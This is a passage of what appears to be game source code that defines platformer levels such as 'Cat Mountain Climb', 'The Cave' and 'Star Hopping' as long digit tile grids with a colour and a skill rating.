110000000110000001100000000000000000000000_10011000100111111111111111111111111111110000000100000000100000000000000000000000_10110000001100000401111101111111110111110000001100000000110000000044000004000000_10000000011100000441111101111511110111110000001000000000010000000444000044400000_11110000111100404441111111115551111111110000011000000000011000000440000044000000_10111000111100444441111111115551111111110000010000000000001000000040000004000000_10101100000004444411111111115551111111111100110000000000001100000040000004000020_10101111111111111111111111115551111111111111110000000000001111111111111111111111_11111111111111111111111111111111111111111111110000000000001111111111111111111111_11111111111111111111111111111111111111111111110000000000001111111111111111111111_11111111111111111111111111111111111111111111110000000000001111111111111111111111',\n skill_mean: 5,\n ),\n Map.new(\n name: 'Cat Mountain Climb',\n data: 
'color_f1f1fa-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000003000000000000000000000000000000000000000000000000000000000000_00000000000000000011110000000000000000000000000000000000000000000000000000000000_00000000000000000001111000000000000000000000000000000000000000000000000000000000_00000000000000000000111100000000000000000000000000000000000000000000000000000000_00000000000000000000011114400000000000000000000000000000000000000000000000000000_00000000000000000000011111100000040000000000000000000000000000000000000000000000_00000000000000000000001111100000044000000000000000000000000000000000000000000000_00000000000000000000001111100000011000000000000000000000000000000000000000000000_00000000000000000000001111110000111000000000000000000000000000000000000000000000_00000000000000000000001111110001111100000000000000000000000000000000000000000000_00000000000000000000004111111001111100000000000000000000000000000000000000000000_00000000000000000000000111111101111110000000000000000000000000000000000000000000_00000000000000000000000111111101111110000000000000000000000000000000000000000000_00000000000000000000000411111111111111000000000000000000000000000000000000000000_00000000000000000000000011111111111111100000000000000000000000000000000000000000_00000000000000000000000001111111111111111000000000000000000000000000000000000000_00000000000000000000000001111111111111111100000000000000000000000000000000000000_00000000000000000000000001111111111111111110000000000000000000000000000000000000_00000000000000000000000000000000111111111111100000000000000000000000000000000000_00000000000000000000000001111100111111111111111100000000000000000000000000000000_00000000000000000000000001111100000111111111111111000000000000000000000000000000_00000000000000000000000001111110000111111100000111110000000000000000000000000000_00000000000000000000000011111111000111444400000000111000000000000000000000000000_00000000000000000000000011111111100000000000000000011000000000000000000000000000_00000000000000000000000011111111100000000000000000001100000000000000000000000000_00000000000000000000000011111111110000000000000000000110000000000000000000000000_00000000000000000000000011111111111111111111100111100110000000000000000000000000_00000000000000000000000011111111111111111111000011000110000000000000000000000000_00000000000000000000000011111111111111111111000011000111000000000000000000000000_00000000000000000000000011111111111111111111000015000511000000000000000000000000_00000000000000000000000011111111111111111111500511000511000000000000000000000000_00000000000000000000000011111111111111111111555511000511000000000000000000000000_00000000000000000000000111111111111111111111155515000511000000000000000000000000_00000000000000000000000111111111111111111111155115000511000000000000000000000000_00000000000000000000000111111111111111111111155111000511100000000000000000000000_00000000000000000000000111111111111111111111111111100511100000000000000000000000_00000000000000000000000111111111111111111111111111100001100000000000000000000000_00000000000000000000000111111111111111111111111111111001100000000000000000000000_0000000000000000000000011111111111111111110000110111100111
0000000000000000000000_00000000000000000000000111111111111111111000000000100000110000000000000000000000_00440000000000000000000111111111111111111000000000000000110000000000000000000000_00414000000000000000000111111111111111110000000000000001110000000000000000005000_00411400000000000000001111111111111111110000000000111111110000000000000000005000_00411140000000000000001111111111111111110005511111111111110000000000000005055500_00411110000000000000001111111111111111100011111111111111110000000000000005550500_00411100000000000000011111111111111111100011000001000000010000000000000000555500_00411000000000000000111111111111111111100000000000000000000000000000000055555500_00410000000000000000111111111111111111110000400000000111100000000000000000055550_00410000000000000011111111111111111111110004440004411111110000000000005000050000_00410000000000001111111111111111111111111044444441111111111000000000005500505550_00410000000000011111111111111111111111111444444411111111111100000000055000005000_00410000000000111111111111111111111111111111111111111111111111000000005000005000_00410000001111111111111111111111111111111111111111111111111111111000005000005000_00410200111111111111111111111111111111111111111111111111111111111111111000005000_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 7,\n ),\n Map.new(\n name: 'Welcome',\n data: 'color_85e085-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000444000000000000000000000000000000000000000000_00000000000000000000000000444000000000000000000000000000000000000000000000000000_00000000000000000444000000000000000000000000000000000000000000000000000100010000_00000000444000000000000000000000000000000000000000000055500000000000001100011000_02000000000000000000000000000001100000000000555000000000000000005555511100011155_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_55555555555555555555555555555555555555555555555555555555555555555555555500055555_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_01100100011101100101000011101101100000110101011101001001000110101100100001110110_01110110011101110111000011001101110000100111011101001001100111101110110001100010_01010111010101100010000010001101010000110101010101101101110101101110111011100110_00000000000000000000000000000000000000000000000000000000000000000000000000000100_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000100_00000000000000000000000000000000000000000000000000000000000000000000000000000000_000000000000000000000000000000000000000000000000000000
00000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00001000100000000000000000000000000000000000000000000000000000000000000000000000_00011000110000000000000000000000000000000000000000000000000000000000000000000000_55111000111555555555555555555555555555555555555555555555555555555555555555555555_11111000111111111111111111111111111111111111111111111111111111111111111111111111_11111000111111111111111111111111111111111111111111111111111111111111111111111111_11111000111111111111111111111111111111111111111111111111111111111111111111111111_11111000111111111111111111111111111111111111111111111111111111111111111111111111_55555000555555555555555555555555555555555555555555555555555555555555555555555555_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_01001010001001101100110010000011101100010110101110101011101100111011101011011010_01111011001001001101111011000001001100010111101100101001001110111001001011011110_00110011101101101101001011100001001100010101101000101101001010101001001011010110_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000100010000_00000000000000000000000000000000000000000000000000000000000000000000001100011000_55555555555555555555555555555555555555555555555555555555555555555555511100011155_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111100011111_11111111111111111111111111111111111111111111111111111111111111111111111103011111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 8,\n ),\n Map.new(\n name: 'Moonlit Woods',\n data: 
'color_944d94-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000440000000000000000000_00000000000000000000000000000000000000000000000000000000044440000000000000000000_00000000000000000000000000000000000000000000000000000000004140000000000000000000_00000000000000000000000000000000000000000000000000004400000110000000000000000000_00000000000000000000000000000000000000000000000000000440000510000440000000000000_00000000000000000000000000000000000000000000000000000444000510000444000000000000_00000000000000000000000000000000000000000000000000000411000010000410000000000000_00000000000000000000000000000000000000000000000000000441100010000114400000000000_00000000000000000000000000000000000000000000000000000000110010001100000000000000_00000000000000000000000000000000000000000000000004440000110011001000000044440000_00000000000000000000000000000000000000000000000000144000011001011000000444440000_00000000000000000000000000000000000000000000000000104000011101110000000014400000_00000000000000000000000000000000000000000000004040114400051155100000001114000000_00000000000000000000000000000000000000000000000111114400005155150001111000000000_00000000000000000000000000000000000000000000000004111000000151151111000004440000_00000000000000000000000000000000000000000000000004011110000001151110000000140000_00000000000000000000000000000000000000000000000000040111000001100000000001140000_00000000000000000000000000000000000000000000000444000011110001110000011111000000_00000000000000000000000000000000000000000000044444000001111000110000111100000000_00000000000000000000000000000000000000000000000011000044011110110111110000004000_00000000000000000000000000000000000000000000000441100000001110110111100000044400_00000000000000000000000000000000000000000000000001111000000110110110000041444140_00000000000000000000000000000000000000000000000000111100000000110000000441011100_00000000000000000000000000000000000000000000000000111100000000110000004011110000_00000000000000000000000000000004440000000000000001100111111101111000001111114440_00000000000000000000000000000044400000000000000011500011111101111011111110011140_00000000000000000000000000000444000000000000000000500005151101111011111150050000_00000000000000000000000000000444000000000000000000500000050001111011550050000000_00000000000000000000000000000444000000000000000000000000000001111000500000000000_00000000000000000000000000000444000000000000000000000000000001111000000000000000_00000000000000000000000000000044400000000000000000000000000001101100000000000000_00000000000000000000000000000004440000000000000000000000000001130000000000000000_0000000000000000000000000000000000000000000000000000000000
0001111000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000000000000000000000000000000000001111000000000000000_00000000000000000000000000000100000000000000000000000000000001111000000000000000_00000000000000001000000000000110000000000100000000000000010001111100000100101000_00000000000000001100010010101111010001010110000010000100010101111110010110101001_00000000000100011100010111101111010011111110000011001110111151111111111111111011_00000000001100011110110111111111111011111110000011001110111111111111111111111111_00000000011100011110111111111111111111101111000011101111111111111511111111111101_00000000011100111111111111101111111111111111000011111111111111111111111511111111_00000000111110111010110111111101111111110111000111111111115111111111111111111111_00000000101110111110111111111111111111111111100111111111111111111111111111111111_00000000111110001000010010100111010111111111000011110105111111111515511515111010_00000000001000501050010515150101010001010010055551515155515151111515515515151510_02000055551555551555515515155151515551515515555551515155515151111115515515151515_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 10,\n ),\n Map.new(\n name: 'Egypt Pyramid',\n data: 'color_ff8844-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000044400000000000000000000000000000000000000_00000000000000000000000000000000000004444444000000000000000000000000000000000000_00000000000000000000000000000000000044444444400000000000000000000000000000000000_00000000000000000000000000000000000044444444400000000000000000000000000000000000_00000000000000000000000000000000000444444444440000000000000000000000000000000000_00000000000000000000000000000000000444444444440000000000000000000000000000000000_00000000000000000000000000000000000444441444440000000000000000000000000000000000_00000000000000000000000000000000000044411144400
000000000000000000000000000000000_00000000000000000000000000000000000044111114400000000000000000000000000000000000_00000000000000000000000000000000000001114111000000000000000000000000000000000000_00000000000000000000000000000000000011144411100000000000000000000000000000000000_00000000000000000000000000000000000111000001110000000000000000000000000000000000_00000050000000000000000000000000001110000000111000000000000000000000000000000000_00000555000000000000000000000000011100000000011100000000000000000000000000000000_00005555500000000000000000000000111000111110001110000000000000000000000000000000_00055000550000000000000000000001111000111110001111000000000000000000000000000000_00550000055000000000500000000011141000015100001411100000000000000000000000000000_05500000005500000005050000000111440000015100000441110000000000000000000000000000_55000000000550000050005000001114400000010100000044111000000000000000000000000000_50000000000055000500000500011144000000010100000004411100000000000000000000000000_00000000000005505000000000111440000000010100000000441110000000000000000000000000_00000000000000550000000001114400001001110111001000044111000000001000000001000000_00000000000000055000000011144000011101000101011100004411100000011100000011100000_00000000000000005500000111140000011111010101111100000411110000011100000011100000_00000000000000000550001111100004411144010104411144000011111000011100000011100000_00000000000000000000011111100004411144010104411144000011111100011100000011100000_00000000000000000000111411100001111111010101111111000011141115511100000011100000_00000000000000000001114411100001111111010101111111000011144111511100000011100000_00000000000000000011144010000004411144010104411144000000104411111100000011100000_00000000000000000111440010100004411144010104411144000010100441111100000011100000_00000000000000001114400010100000011100010100011100000010100044111100000011100000_00000000000000011144000000100000011101110111011100000010000004411100000011100000_00000000000000111140000011100000011101110111011100000011100000411110000011100000_00000000000001111100000011100000011100010000011100000011100000011111555511150000_00000000000011111100000011100000011100010100011100000011100000011111155511155000_00000000000111411111100011100011111101110111011111100011100011111111111111111100_00000000001114411111100011100011111101500051011111100011100011111111111111111100_00000000011144000001100011100011000001500051000001100011100011000000000000001100_00000000111440000000000011100000000001500051000005500011100000000000000000000000_02000001114400011100000011100000000001503051000055500511150000011111111111100000_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 12,\n ),\n Map.new(\n name: 'The Cave',\n data: 
'color_7a7a94-00000000000000000000000011111111111111111111111111111111111111111111111111111111_00000000000000000000001111111111111111111111111111111111111111111111111111111111_00000000000000000111111111111111111111111111111111111111111111111111111111111111_00000000000000001111111111111111111111111111111111111111111111111111111111111111_00000000000000011111111111555111111111111111111111111111111111111111111111055111_00000000000000011115511155055100000100011111111111111111111100000000000000005511_00000000000000055000500000000000000000000000001000001000011001111111111110000511_00000000000000050000000000000000000000000000001000100000000011111111111111100011_00000000000000000000001000000000500000000000000000100000000111111111111111100111_00000000000000000000011000000005500100000051500000110015000011111111111111100111_00000000000111111111111111111111511111111111111101111111110001111111111111110111_02000011111111111111111111111111111111111111111101111111111000000111111111110111_11111111111111111111111111111111111111111111111101111111111110000000000051110111_11111111111111111111111111111111111111111111111101111111111111111111110555110111_11111111111111111111111111111111111111111111111101111111111111111111111155110111_11111111111111111111111110000001111111111111111101111100011111111111111151110111_11111111111111111111111114000001111111111111111101111001001111110111111111110111_11111111111111111111111114444001111111111111111101111001100001110001111111110111_11111111111111111111111114444400000000000100100000011011111100111110011111110111_11111111111111111111111114444001111111110000000400011011111110011111011111110111_11111111111111111111111114444441111111111444444444411011111110001111100111110111_11111111111111111111111111111111111111111111144414411011111110001111110011100111_11111111111111111111111111111111111111111111111111111011100000000000000000000111_11111111111111111111111111111111111111111111111111111011011111111111111111100111_11111111111111111111111111111111111111111111111111111000111111111111111111001111_11111111111111111111111111111111111111101111111111111101111111111111111100111111_11111111111111111111111111111111111111011111001111111100111111111111100011111111_11300001111111111111111111111111111110011111100111111101111111111155001111111111_11111101111111111111111111111111111111011111110111111101111111115511111111111111_11111100000000000000000000000000000000011111110111111101111111155511111111111111_11111111111110011111111111111111100111000111110111111101111111151111111111111111_11111111501111011111111111111111111111110001110111111101111111155511111111111111_11111155511111000011111111111111111111111000000111111101111111111551111111111111_11111551111111110011111111111111111111111011111111111101111111111111111111111111_11111511111111110511111111111111111111111011111111111101111111111111111111111111_11111111111111105551111111111110000000000000511111111101111111111111111111111111_11111111111111105555111111111000111111111111155011111101111111111111111111111111_11111111111111155555111111111001111111111111111151111101111111111111111111111111_11111111111111111111111111110011111111111111111551111101111111111111111111111111_11111111111111111111111111110111111111111111111151111101111111111111111111111111_11111111111100000110011111110111111111111111111111111101111111111111111111111111_11111111111100000000000011110111115111111111111111111101111111111111111111111111_11111111111044400000000011110111551111111111111111111101111111111111111111111111_1111111111144444000000000000000001111111111111111111150111
1111111111111111111111_11111111111444444400511111110111111111111111105115115505111151111111111111111111_11111111111111111111111111110111111115555111500150555505555551511115111111111111_11111111111111111111111111110111111115550511000150005500550051551105511111111111_11111111111111111111111111110111111115000051000500000500500051500100515111111111_11111111111111111111111111000111111110000051000500000000500005000000510511111111_11111111111111100000000000000000000000000005000000000000500005000000010511111111_11111111111111110011111111111111111000000005000000000000000000000000050011111111_11111111111111110111111111111111111000000000000000000000000000000000050011111111_11111111111111100111111111111111111000000000000000000000000000000000000011111111_11111111111111101111111115555511111100000000000000000444000000000000000001111111_11111111111111101111111111111551111110000000000000004444400000000000000000111111_11111111111111101111111111111151111111000000000000044444444000000000010005111111_11111111111111110005011111111151111111000000000000044444444440000001010005511111_11111111111111111111050050555551111111111001111104444111144444010001510055111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 13,\n ),\n Map.new(\n name: 'Cyberpunk Ruins',\n data: 'color_3399aa-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000111111110000000000000000000000000000_00000000000000000000000000000000000000000000000000100000000000000000000000000000_00000000000000000000000000000000000000111111111111111000000000000000000000000000_00000000000000000000000000000000000000010000000000000000000000000000000000000000_00000000000000000000000000000000000011111111111111111111000000000000000000004000_00000000000000000000000000000000000000010001000000100100000000000000000000044000_00000000000000000000000000000000011111110111111111110111111000000000000000044000_00000000000000000000000000000000000000010000000000000100000000000000000000044000_00000000000000000000000000000000000111110111111111110111000000000000000000044000_00000000000000000000000000000000000001110111000000010100000000000000000000011000_00000000000000000000000000000000000011110111100001110111000000000000000000011000_00000000000000000000000000000000000001500051000000114110000000000000000000011000_00000000000440000000000000000000000011103011100000114110000000000000000000111000_00000000000000000000004400000000000000111110000000114100000000000000000001111000_00000000000000000000000000000000000000044400000000114000000000000000000001111000_00000000000000000000000000000000000000000000000000114010000000000000000001111000_00000002000000000000000000004400000000000000000000104110000000000000000001001000_00000011111111111110000000000000000000000000000000014110000000000000000111111110_00000000111111110010000000000000000000000000000000114110000000000550000111001110_00000001111111111110000000000000000000000000000000114110000001111111111111111110_00000011111111110010000000000000001111111110000001114111000001144444444111001110_000001111110111111100000000000000010011001110
00000010100000001100000000111111110_00001111111111110010000000000000001111111111100000010111114411100000000001001100_00011111111111110000000000000000001001111111110000010100000001100000000001001100_00111111111110010000000000000000000001111111111000010111144111100000000001001100_00111111111111110000000000000000000001111110011000010100000001100000000001001100_00110011111111110000000500000000000001111111111000010111441111100000101111111111_00111111111111110000005500000500001001101110011551010100000001100000100001001100_00110011111111111111111111111111111111111111111111011114411111100000110111111111_00111111111110010015555555555555001001111111011001010100000001100000110001001100_00111111111111111110050505555500001111111111111111011111441111100000111011111110_00111111111110010010050000550000001001111111011001010100000000000000111001001100_00111111111111110000000000500000001111111111111111011111144111110000111101111110_00110111101111110000000000500000051001101111111001010100000000000000100101001100_00111111111111110000000000000000051111111111111111010111114411111000111101111110_00111111111111110000000000000005551001100000011001010000000000000000100101001100_00111144444444111111111111111111111111111111111111011111111111111111111101111111_00111111111144111114440000000005551001100000000001000000000001100000100101001111_00111111111144110014400000000000551111100111111141011111114411114400000101111100_00111111110044111114000000000000051441100000011001005100000001100000000001001111_00110011110111110010000000000000051141110011111001005111144111111440000001111100_00111111110111111110000000000000001441100000011001005100000001100000000001001111_00000000000100110010000000000000000441111001111411011111441111111144000000111100_11111011111111111110000000000000000441100000011001000100000001100000000000001111_11111001111111110010000000000000000441111100111001000114411111111114400000011100_00110000000010110000000000000000000441100000011001000100000001100000000001001111_11110000000011110000000000000055000441111110011004000100000001100000000101001100_00110000000010110000000000055550000441100000011001000000000001100000000101001100_11111111110111111011111111111111111111111111011111111111111111111111111111101111_00110000000011000010000005555000001001100000011111000000000001100000011111101111_11110000000000011110000055000000001111104444000001000000000004400000000101001100_00110000000000110010005550000000001001100000011000000055000001100000000000001100_11111111111111111110055000000000001111111111111111111111111111111111111111111100_11111111101000110010000000000000001001111111111001000000000001100000000001001100_00110000000000110000000000000000000001111111111001000000000001100000000001001100',\n skill_mean: 15,\n ),\n Map.new(\n name: 'Steamport Town',\n data: 
'color_ffbd7d-00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000000000000000000000000000000000000000000000000000000000000000_00000000000000000000110011111111110000000000000440000000000001110000000000000000_00000000000000000001111115555555111000000000000110000000000011111000000000000000_00000000000000000001111111111111111000000000011111100000000111511100000000000000_00000000000000000000110011111111114000000000044114400000000111151100000000000000_00000000000000000000000000000110000400411111114114111111100111151100000000000000_00000000000000000000000000000000000044000000044114400000000111151100000000000000_00000000000000000000000000000000000000000000011111100000000011111000000000000000_00000000000040000000000000000000000000000000044114400000000041110000000000000000_00000000000010000000000000000000011100001111114114111111400400100000000000000000_00000000000014000000000000000000111110000000044114400000044001110000000000000000_00000000000011000000000000000001115111000000011111100000000001110000000000000000_00000000000011000000000000000001111511000000011111100000000000000000000000000000_00000000000011000000000000000001111511000001115115111000000000000000000000000000_00000000000010000000000000000001111511000001111111111000000000000000000000000000_00000000000010000000000000000000111110000000011111100000000000000000000000000000_00000000000010000000000000000000011140000000011111100000000000000000000000000000_00000000000114000000000000000000001004000000044114400000000000000000000000000000_00000000000114400000000000000000011100400411114114111100000000000000000000000000_00000000001111440000000000000000011100044000044114400000000000000000000000000000_00000000011111140000000000000000000000000000011111100000000000000000000000000000_00000000111001110000000000000000000000000000011111100000000000000000000000000000_00000001110000110000000000000000000000000000111111110000000000000000000000000000_00000011140000110000000000000000000000000001111111111000000000000000000000000000_00000111440000110000000000000000000000000001100000000000000000000000000000000000_00001110440000110000000000000000000000000001104440111100000000000000000000000000_00011100440000110000000000000000000000000001104440011000000000000000000000000000_00111000440000110000000000000000000000000001104444011000000000000000000000000000_00110000440000110000000000000000000000000001104444011000000000000000000000000000_02114000440000110000000000000000000000000001104444011000000000000000000000000000_01111100440000110000000000000000000000000001100000011000000000000000000000000000_01111111111100110000000000000000000400000011101111011100000000000000000000000000_00110000000000110000000000000000000100000111100110011110000000000000000000000000_00110000000000110000000000000000004140000111110110111110000000000000000000000000_00110000000000110000000000000000001110000001100110011000000000000000000000000000_00110000000000110000000000000000041114000001100000011000000000000000000000000000_00110000440000110000000000000000411111400001104444011000000000000000000000000000_00110000440000110000000000000004111111140001104444011000000000000000000000000000_00110000440000114000000000000001111111110001104444011000000000000000000000000000_00110000440000114000000000000000000000000001104444011000000000000000000000000000_00110001111111111000000000000000011111000001104444011000000000000000000000000000_00110000000011111000000000000000011111000001104444011000000000000000000000000000_0011000000000011000000000000000001144100000110000001100000
0000000000000000000000_00110000000000110000000000000000011441000001101111011000000000000000010000000000_00110000440000110000000000000000011441000001101111011000000000000000111000100000_00110000440000110000000000000000011441000001101111011000000000001000011101110000_01111100440000110000000000000000011441000001100000011000000000011100011100111000_01111111111000110000000000000000011441000111101111011110000000001100011100111000_00110000000000110000000000000000011441000111101111011110000000001100011100111000_00110000000000110000000000000000011000000411101111011140000000001100011000110000_00110000440000114404404404404404411000000441100000011440000000001100011000110000_00110000440011111111111111111111111011111111111011111111111100001000010000100000_00110011111111111111111111111111111011111111111011111110000000111000010000100300_00110000000000111111000000000111111400111111100011111100000000111444414441111110_00110000000000111100000000000001111410011111001011111000000000111111111111111000_01111100440000111000000000000000111411001110011011111555555555111111111111115555_01111111111000110000000000000000011411104140111011011555555555551111111111155555_00440000000000000011000000000110000000004440000000011555555555555555555555555555_11111111111111111111000000000111111111111111100000011111111111111111111111111111',\n skill_mean: 16,\n ),\n Map.new(\n name: 'Find the Dragon',\n data: 'color_ccff99-00000000000000000000000000000000000000000111111111111111111111111111111111111111_00000000000000000000001111110000000000000111111000000550000001111111111111111111_00000000000000000000011111100000000000001111111000000550000001111111111111111111_00000000000000000000111111000000010000011111111000000550000001111110111111111111_00000000000000000000111110000001111000111111111000000550000001111100010101111111_00000000000000000000011111000111010001110000000000005555000000000000000000111111_00000000000000000011001111111100000001100111111000000000000001111111000000111111_00000000000000000111111111110000000011001111111000000000000001111111111100001111_00000000000000000111111111000000000110011111111000005555000001111111111111000011_00000000000000000000010111000000000000111111110000000550000000011111111111100051_00000000000000000000000101300111111111111111110111111111111111011111111111110001_00000000000000000000111111111111111111111111110111111111111111011111111111111001_00000000000000000000001111111111111111111400000011111111111110000004111111110001_00000000000000000000000001111111111111111444400411111111111110004044111100010011_00000000000000000000000000000001111111111444444411111111111114444444111101000011_00000000000000000000000000000000011011111111111111111110001111111111111101100011_00000000000000000000000000000000001011111111111111001000000011111111111100150111_00000000000000000000000000000000000010001111111110000000000000111111111110111111_00000000000000000000000000000000000000000111111000000000000000010001111110111111_00000000000000000000000000000000000000000011000000000000000000010001101110011111_00000000000000000000000000000000000000000011000000000000000000000000101111001111_00000000000000000000000000000000000000000010000000000000000000000000000111001111_00000000000000000000000000000000000000000000000000000000000000000000000111000511_00000000000000000000000000000000000000000000000000000000000000000000000011000051_00000000000000000000000000000000000000000000000000000000000000000000000011100001_00000000000000000000000000000000000000000000000000000000000000000000000001100001_000000000000000000000000000000000000000000000
00000000000000000000000000001100001_00000000000000000000000000000000000000000000000000000000000000000000000001110001_00000000000000000000000000000000000000000000000000000000000000000000000001110001_00000000000000000000000000000000000000000000000000000000000000000000000000155001_00000000000000000000000000000000000000000000000000000000000000000000000000115001_00000000000000000000000000000000000000000000000000000000000000000000000000015001_00000000000000000000000000000000000000000000000000000000000000000000000000010001_00000000000000000000000000000000000000000000000000000000000000000000000000010001_00000000000000000000000000000000000000000000000000000000000000001010000000010001_00000000000000000000000000000000000000000000000000000000000000011110000000011001_00000000000000000000000000000000000000000000000000000000000000110110000000001001_00000000000000000000000000000000000000000000000000000000000000111110000000001001_00000000000000000000000000000000000000000000000000000000001000000110100000001001_00000000000000000000000000000000000000000000000000000000001100111110110000001001_00000000000000000000000000000000000000011444400000000000000110001100110000011001_00000000000000000000000000000000000001111111140000000000000011111111110000010001_00000000000000000000000000000000000111111111140000000000000001101100110000110011_00000040000000000000000000000000000111111000040000000000000000001100110000110051_10000444000400000000000000000000001111110000040000000000000000011110110001110001_11000444000440000010000000000000011111100000040000000000000000011110000011111001_11100040004444000111000000000000011111100000040000000000000000111111100111110001_11111040000444001111100000000001111111100000040000000000000011111111111111100001_11111140000040011111110000000011111111100000040000000000001111111111111111100111_11111110000040001404100000001111111111100000040000000000001111111111111111100011_11111111100040001020000000111111111111100000040000000000011111111111111111100001_11111111111111111111111111111111111111100000000000000001111111110551151111110001_11111111111111111111111111111111111111100000040000000111111111000051051051111001_11111111111111111111111111111111111111100000000000000011111111050000050001000001_11111111111111111111111111111111111111100000040000000001111110050000000000000011_11111111111111111111111111111111111111100000000000000001111111550000000011100001_11111111111111111111111111111111111111110000040000000001111111155000011111115001_11111111111111111111111111111111111111114444444444444444441144111444111111111111_11111111111111111111111111111111111111111444444444444444444444444411111111111111_11111111111111111111111111111111111111111111111111111111111111111111111111111111',\n skill_mean: 19,\n ),\n Map.new(\n name: 'Star Hopping',\n data: 
'color_a3a3cc-00000000000000000000055500000000044444440000000000000000000000000000000000000000_00000000000000000055511115000004444444440000000000000000100000000000000000000000_00000000000000005511111111110444440044440000000000000000000000000000000000010000_00000300000000051111111111111144000044400000000000000000000000000000000000000000_00001110000000511111011111111110000044400000000000000000000000000000000000000000_00011111000005111111111001111111000444000000000000000000000000000001000000000000_00111111100001111011110000111111100444000000000000000000000000000011100000000000_00111111100051110011111001111111104440000000000000000000000000000001000000000000_00011111000011111111111111110011114440000000000000001000000000000000000000000000_00001110000011111111111111110111144400000000000000011100000000000000000000000000_00101010100011111111011111111111444400000000000000001000000000000000000000000000_00111111100111101111111111111114444000000001000000000000000000000000000010000000_00110001100111111111111111111144441000000000000000000000000000000000000111000000_00100000100111111111111111111144411000000000000000000000000000000000000010000000_00100000100111111111111111111444111000000000000000000000000000000000000000000000_00000000000011111111111111114444110000000000000000000000000000000000000000000000_00000000000011111111111111144441110000000000000000000000000000000000000000000000_00000000000011111111111111444411110000011000000000000000000010000000000000000000_00000000000001111111111114444111100000111100000000000000000111000000010000000000_00000000000041111111111144441111100000111100000000000000000010000000000000000000_00000000000444111111114444411111000000011000000000000000000000000000000000000000_00000100004440011111144444111110000000000000000000000010000000000000000000000000_00001110044400001111444411111100000000000000000000000111000000000000000000000000_00000100044000000144444111110000000000000000000000000010000000000000000000000000_00000000444000004444441110000000000010000000000000000000000000000000000000001000_00000000444004444444400000000000000000000000000000000000000000000100000000000000_00000004444444444440000000000000000000000000000100000000000000001110000000000000_00010004444444440000000000000000000000000000000000000000000000000100000000000000_0011100044440000000000001110000000000000000000